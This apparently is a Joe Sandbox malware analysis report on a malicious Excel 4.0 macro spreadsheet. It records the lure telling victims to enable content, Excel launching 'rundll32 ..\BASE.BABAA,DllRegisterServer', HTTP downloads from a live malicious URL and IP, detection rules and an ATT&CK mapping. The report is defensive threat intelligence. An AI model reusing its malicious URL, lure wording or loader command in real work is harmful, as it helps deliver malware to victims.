Loading ...

Play interactive tourEdit tour

Analysis Report SecuriteInfo.com.Exploit.Siggen3.10350.27303.12062

Overview

General Information

Sample Name:SecuriteInfo.com.Exploit.Siggen3.10350.27303.12062 (renamed file extension from 12062 to xls)
Analysis ID:355599
MD5:ad9550ee6ece8322501ed92d374d3928
SHA1:d0617e5cb90b4db4fcf2269ffd8228b9ca4f89af
SHA256:74423c8236cd5057af8e4ffbf84fdcbb34f5e6dc8f8dc0520c685c7fd6bc100a

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malicious Excel 4.0 Macro
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Microsoft Office Product Spawning Windows Shell
Allocates a big amount of memory (probably used for heap spraying)
Document contains embedded VBA macros
IP address seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 1748 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • rundll32.exe (PID: 2728 cmdline: rundll32 ..\BASE.BABAA,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
SecuriteInfo.com.Exploit.Siggen3.10350.27303.xlsSUSP_Excel4Macro_AutoOpenDetects Excel4 macro use with auto open / closeJohn Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x26ca2:$s1: Excel
  • 0x27d0a:$s1: Excel
  • 0x35b4:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A

Sigma Overview

System Summary:

barindex
Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: rundll32 ..\BASE.BABAA,DllRegisterServer, CommandLine: rundll32 ..\BASE.BABAA,DllRegisterServer, CommandLine|base64offset|contains: ], Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1748, ProcessCommandLine: rundll32 ..\BASE.BABAA,DllRegisterServer, ProcessId: 2728

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Antivirus detection for URL or domainShow sources
Source: http://www.chipmania.it/mails/open.phpAvira URL Cloud: Label: malware
Multi AV Scanner detection for submitted fileShow sources
Source: SecuriteInfo.com.Exploit.Siggen3.10350.27303.xlsVirustotal: Detection: 11%Perma Link

Compliance:

barindex
Uses new MSVCR DllsShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior

Software Vulnerabilities:

barindex
Document exploit detected (UrlDownloadToFile)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileAJump to behavior
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exeJump to behavior
Source: excel.exeMemory has grown: Private usage: 4MB later: 60MB
Source: global trafficDNS query: name: www.chipmania.it
Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.81.0.78:80
Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.81.0.78:80
Source: Joe Sandbox ViewIP Address: 185.81.0.78 185.81.0.78
Source: global trafficHTTP traffic detected: GET /mails/open.php HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.chipmania.itConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /mails/open.php HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.chipmania.itConnection: Keep-Alive
Source: rundll32.exe, 00000003.00000002.2148054390.0000000001C50000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknownDNS traffic detected: queries for: www.chipmania.it
Source: rundll32.exe, 00000003.00000002.2148054390.0000000001C50000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000003.00000002.2148054390.0000000001C50000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
Source: rundll32.exe, 00000003.00000002.2148203075.0000000001E37000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000003.00000002.2148203075.0000000001E37000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: rundll32.exe, 00000003.00000002.2148203075.0000000001E37000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: rundll32.exe, 00000003.00000002.2148203075.0000000001E37000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: rundll32.exe, 00000003.00000002.2148054390.0000000001C50000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000003.00000002.2148203075.0000000001E37000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000003.00000002.2148054390.0000000001C50000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: rundll32.exe, 00000003.00000002.2148054390.0000000001C50000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.

System Summary:

barindex
Found malicious Excel 4.0 MacroShow sources
Source: SecuriteInfo.com.Exploit.Siggen3.10350.27303.xlsInitial sample: urlmon
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Screenshot number: 4Screenshot OCR: Enable editing button from the yellow bar above 15 " Once you have enabled editing, please click
Source: Screenshot number: 4Screenshot OCR: Enable content button jl , ' ' "==~ " from the yellow bar above 18 m ^mt~ .. |j 23 24 25 2
Source: Document image extraction number: 0Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled editing, please click Enable
Source: Document image extraction number: 0Screenshot OCR: Enable content button from the yellow bar above I \ , I ' /
Found Excel 4.0 Macro with suspicious formulasShow sources
Source: SecuriteInfo.com.Exploit.Siggen3.10350.27303.xlsInitial sample: EXEC
Source: SecuriteInfo.com.Exploit.Siggen3.10350.27303.xlsOLE indicator, VBA macros: true
Source: SecuriteInfo.com.Exploit.Siggen3.10350.27303.xls, type: SAMPLEMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
Source: rundll32.exe, 00000003.00000002.2148054390.0000000001C50000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
Source: classification engineClassification label: mal88.expl.evad.winXLS@3/5@1/1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\4FCE0000Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRC37D.tmpJump to behavior
Source: SecuriteInfo.com.Exploit.Siggen3.10350.27303.xlsOLE indicator, Workbook stream: true
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\BASE.BABAA,DllRegisterServer
Source: SecuriteInfo.com.Exploit.Siggen3.10350.27303.xlsVirustotal: Detection: 11%
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknownProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\BASE.BABAA,DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\BASE.BABAA,DllRegisterServerJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting21Path InterceptionProcess Injection1Masquerading1OS Credential DumpingFile and Directory Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumNon-Application Layer Protocol2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsExploitation for Client Execution23Boot or Logon Initialization ScriptsExtra Window Memory Injection1Disable or Modify Tools1LSASS MemorySystem Information Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothApplication Layer Protocol12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Rundll321Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting21LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonExtra Window Memory Injection1Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
SecuriteInfo.com.Exploit.Siggen3.10350.27303.xls11%VirustotalBrowse

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
chipmania.it1%VirustotalBrowse
www.chipmania.it2%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://www.chipmania.it/mails/open.php100%Avira URL Cloudmalware

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
chipmania.it
185.81.0.78
truefalseunknown
www.chipmania.it
unknown
unknownfalseunknown

Contacted URLs

NameMaliciousAntivirus DetectionReputation
http://www.chipmania.it/mails/open.phptrue
  • Avira URL Cloud: malware
unknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkrundll32.exe, 00000003.00000002.2148203075.0000000001E37000.00000002.00000001.sdmpfalse
    high
    http://www.windows.com/pctv.rundll32.exe, 00000003.00000002.2148054390.0000000001C50000.00000002.00000001.sdmpfalse
      high
      http://investor.msn.comrundll32.exe, 00000003.00000002.2148054390.0000000001C50000.00000002.00000001.sdmpfalse
        high
        http://www.msnbc.com/news/ticker.txtrundll32.exe, 00000003.00000002.2148054390.0000000001C50000.00000002.00000001.sdmpfalse
          high
          http://www.icra.org/vocabulary/.rundll32.exe, 00000003.00000002.2148203075.0000000001E37000.00000002.00000001.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          unknown
          http://windowsmedia.com/redir/services.asp?WMPFriendly=truerundll32.exe, 00000003.00000002.2148203075.0000000001E37000.00000002.00000001.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          unknown
          http://www.hotmail.com/oerundll32.exe, 00000003.00000002.2148054390.0000000001C50000.00000002.00000001.sdmpfalse
            high
            http://investor.msn.com/rundll32.exe, 00000003.00000002.2148054390.0000000001C50000.00000002.00000001.sdmpfalse
              high

              Contacted IPs

              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs

              Public

              IPDomainCountryFlagASNASN NameMalicious
              185.81.0.78
              unknownItaly
              52030SERVERPLAN-ASITfalse

              General Information

              Joe Sandbox Version:31.0.0 Emerald
              Analysis ID:355599
              Start date:20.02.2021
              Start time:02:06:08
              Joe Sandbox Product:CloudBasic
              Overall analysis duration:0h 4m 56s
              Hypervisor based Inspection enabled:false
              Report type:full
              Sample file name:SecuriteInfo.com.Exploit.Siggen3.10350.27303.12062 (renamed file extension from 12062 to xls)
              Cookbook file name:defaultwindowsofficecookbook.jbs
              Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
              Number of analysed new started processes analysed:6
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • HDC enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Detection:MAL
              Classification:mal88.expl.evad.winXLS@3/5@1/1
              EGA Information:Failed
              HDC Information:Failed
              HCA Information:
              • Successful, ratio: 100%
              • Number of executed functions: 0
              • Number of non-executed functions: 0
              Cookbook Comments:
              • Adjust boot time
              • Enable AMSI
              • Found Word or Excel or PowerPoint or XPS Viewer
              • Found warning dialog
              • Click Ok
              • Attach to Office via COM
              • Scroll down
              • Close Viewer
              Warnings:
              Show All
              • Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe

              Simulations

              Behavior and APIs

              No simulations

              Joe Sandbox View / Context

              IPs

              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
              185.81.0.78SecuriteInfo.com.Exploit.Siggen3.10350.26515.xlsGet hashmaliciousBrowse
              • www.chipmania.it/mails/open.php
              SecuriteInfo.com.Exploit.Siggen3.10350.31033.xlsGet hashmaliciousBrowse
              • www.chipmania.it/mails/open.php
              SecuriteInfo.com.Heur.1476.xlsGet hashmaliciousBrowse
              • www.chipmania.it/mails/open.php
              SecuriteInfo.com.Heur.1181.xlsGet hashmaliciousBrowse
              • www.chipmania.it/mails/open.php
              SecuriteInfo.com.Heur.21235.xlsGet hashmaliciousBrowse
              • www.chipmania.it/mails/open.php
              SecuriteInfo.com.Heur.15875.xlsGet hashmaliciousBrowse
              • www.chipmania.it/mails/open.php
              SecuriteInfo.com.Heur.21759.xlsGet hashmaliciousBrowse
              • www.chipmania.it/mails/open.php
              SecuriteInfo.com.Heur.2804.xlsGet hashmaliciousBrowse
              • www.chipmania.it/mails/open.php
              SecuriteInfo.com.Heur.1138.xlsGet hashmaliciousBrowse
              • www.chipmania.it/mails/open.php
              SecuriteInfo.com.Heur.11266.xlsGet hashmaliciousBrowse
              • www.chipmania.it/mails/open.php
              SecuriteInfo.com.Heur.18554.xlsGet hashmaliciousBrowse
              • www.chipmania.it/mails/open.php
              Sign-636.xlsGet hashmaliciousBrowse
              • www.chipmania.it/mails/open.php
              Sign-92793351_1597657581.xlsGet hashmaliciousBrowse
              • www.chipmania.it/mails/open.php
              Sign-979329054_1327186231.xlsGet hashmaliciousBrowse
              • www.chipmania.it/mails/open.php
              Sign-709986424_219667767.xlsGet hashmaliciousBrowse
              • www.chipmania.it/mails/open.php
              Sign-709986424_219667767.xlsGet hashmaliciousBrowse
              • www.chipmania.it/mails/open.php
              Sign-488964532_2104982999.xlsGet hashmaliciousBrowse
              • www.chipmania.it/mails/open.php
              Sign-488964532_2104982999.xlsGet hashmaliciousBrowse
              • www.chipmania.it/mails/open.php
              Sign-707465831_1420670581.xlsGet hashmaliciousBrowse
              • www.chipmania.it/mails/open.php

              Domains

              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext

              ASN

              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
              SERVERPLAN-ASITSecuriteInfo.com.Exploit.Siggen3.10350.26515.xlsGet hashmaliciousBrowse
              • 185.81.0.78
              SecuriteInfo.com.Exploit.Siggen3.10350.31033.xlsGet hashmaliciousBrowse
              • 185.81.0.78
              SecuriteInfo.com.Heur.1476.xlsGet hashmaliciousBrowse
              • 185.81.0.78
              SecuriteInfo.com.Heur.1181.xlsGet hashmaliciousBrowse
              • 185.81.0.78
              SecuriteInfo.com.Heur.21235.xlsGet hashmaliciousBrowse
              • 185.81.0.78
              SecuriteInfo.com.Heur.15875.xlsGet hashmaliciousBrowse
              • 185.81.0.78
              SecuriteInfo.com.Heur.21759.xlsGet hashmaliciousBrowse
              • 185.81.0.78
              SecuriteInfo.com.Heur.2804.xlsGet hashmaliciousBrowse
              • 185.81.0.78
              SecuriteInfo.com.Heur.1138.xlsGet hashmaliciousBrowse
              • 185.81.0.78
              SecuriteInfo.com.Heur.11266.xlsGet hashmaliciousBrowse
              • 185.81.0.78
              SecuriteInfo.com.Heur.18554.xlsGet hashmaliciousBrowse
              • 185.81.0.78
              Sign-636.xlsGet hashmaliciousBrowse
              • 185.81.0.78
              Sign-92793351_1597657581.xlsGet hashmaliciousBrowse
              • 185.81.0.78
              Sign-979329054_1327186231.xlsGet hashmaliciousBrowse
              • 185.81.0.78
              Sign-709986424_219667767.xlsGet hashmaliciousBrowse
              • 185.81.0.78
              Sign-709986424_219667767.xlsGet hashmaliciousBrowse
              • 185.81.0.78
              Sign-488964532_2104982999.xlsGet hashmaliciousBrowse
              • 185.81.0.78
              Sign-488964532_2104982999.xlsGet hashmaliciousBrowse
              • 185.81.0.78
              Sign-707465831_1420670581.xlsGet hashmaliciousBrowse
              • 185.81.0.78
              SecuriteInfo.com.Exploit.Siggen3.10048.21670.xlsGet hashmaliciousBrowse
              • 93.95.216.145

              JA3 Fingerprints

              No context

              Dropped Files

              No context

              Created / dropped Files

              C:\Users\user\AppData\Local\Temp\3CCE0000
              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              File Type:data
              Category:dropped
              Size (bytes):155530
              Entropy (8bit):7.660584123957991
              Encrypted:false
              SSDEEP:3072:YxWVpupSzxNEBBD+Os7/xxkKCtRbsYO1entseoXXj:YEGSzx0dmxk7RbsYsKtseoXT
              MD5:C44E2E9FEFA57B31CDEFC8D201D895B5
              SHA1:6507ACF9CFBF7142AD5696253F3ABC300BB662CE
              SHA-256:9D1BC9044DB37900099FC4CB51160F6EA2C9A34D19ABEC0219F134C762991BE4
              SHA-512:D1C34695305599BDD43B280720D2AAA4E5C5DDC4A5B41449E85F16895D85C9474982D1F88254CD153D66B2A07C3F1B3E7AA48D0B4FE457F590059F01B45ECFCE
              Malicious:false
              Reputation:low
              Preview: ...n.0.E.......D'.....E....I?.&..k..a...;...5.K....{..H......"j.Zv..X.Nz.]..._..$...;h....,..?l.`E..[..>q...+......|.".m.x.r-:......K.R...[..J<.T.n....R;V}..Q-.!.-E"...#H.W+-Ay.hI...A(...5M.....R......#...tY8....Q..}%..,.`....r..*..^.}.wja...;..7a.^|c.......H....6.LSj.X!..ubi..v/..J$.r.....39...I...Q|O5r..w.T...|.c..O........0m...\..n':D.E.u..O....?..|.(........{...1...&.........1}.}@.."L.....]....4....u .t..<.\ .S...6/...........PK..........!..#|.....X.......[Content_Types].xml ...(...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Sat Feb 20 09:06:38 2021, atime=Sat Feb 20 09:06:38 2021, length=8192, window=hide
              Category:dropped
              Size (bytes):867
              Entropy (8bit):4.488986575688329
              Encrypted:false
              SSDEEP:12:85QUNcLgXg/XAlCPCHaXtB8XzB/KPaUX+WnicvbwbDtZ3YilMMEpxRljK6TdJP9O:85jNK/XTd6jASUYegDv3qfrNru/
              MD5:781443D351DE3D8B9E000C3D089898F3
              SHA1:7AE6978567BD588E9117BA9E8EC200331B4714AA
              SHA-256:EF036CCC61EFD384EB738CB22440DA9C5E95B4CB67C72B5FB430D55034011F7D
              SHA-512:C43F4F27886E9B341A186F28750D85A6117902945603142928AD61BD1686D1D0867889641183008810454D4E435F40CEDAB29C67FC16E24C88702114343D3802
              Malicious:false
              Reputation:low
              Preview: L..................F...........7G......p.......p.... ......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1.....TR.P..Desktop.d......QK.XTR.P*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\688098\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......688098..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\SecuriteInfo.com.Exploit.Siggen3.10350.27303.LNK
              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sat Feb 20 09:06:25 2021, mtime=Sat Feb 20 09:06:38 2021, atime=Sat Feb 20 09:06:38 2021, length=168448, window=hide
              Category:dropped
              Size (bytes):2368
              Entropy (8bit):4.569920188815355
              Encrypted:false
              SSDEEP:48:8HAd/XT0jxHC31qHClfQh2HAd/XT0jxHC31qHClfQ/:8HG/XojxitlfQh2HG/XojxitlfQ/
              MD5:FC67E56CC21CA04C73C4B56C9D1B47FF
              SHA1:ADEA14F4591F2632F89A83ED1045502CB94FD043
              SHA-256:D6F94A6DFDE437561339F3F912B8D14674425D9A646A914197EF1F0BD25F9010
              SHA-512:212BA29FB7714D1D43FA97EDC52453DED1301CF57A6E9B45EE898C8E5A39E0CA9DCAB706D7DD829BAC52ACD03C9914EEC8EA0893E30E678734C72F7A76A4085E
              Malicious:false
              Reputation:low
              Preview: L..................F.... ...u...p.......p....S..p................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1.....TR.P..Desktop.d......QK.XTR.P*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.....TR.P .SECURI~1.XLS.........TR.PTR.P*.........................S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...E.x.p.l.o.i.t...S.i.g.g.e.n.3...1.0.3.5.0...2.7.3.0.3...x.l.s.......................-...8...[............?J......C:\Users\..#...................\\688098\Users.user\Desktop\SecuriteInfo.com.Exploit.Siggen3.10350.27303.xls.G.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...E.x.p.l.o.i.t...S.i.g.g.e.n.3...1.0.3.5.0...2.7.3.0.3...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.
              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
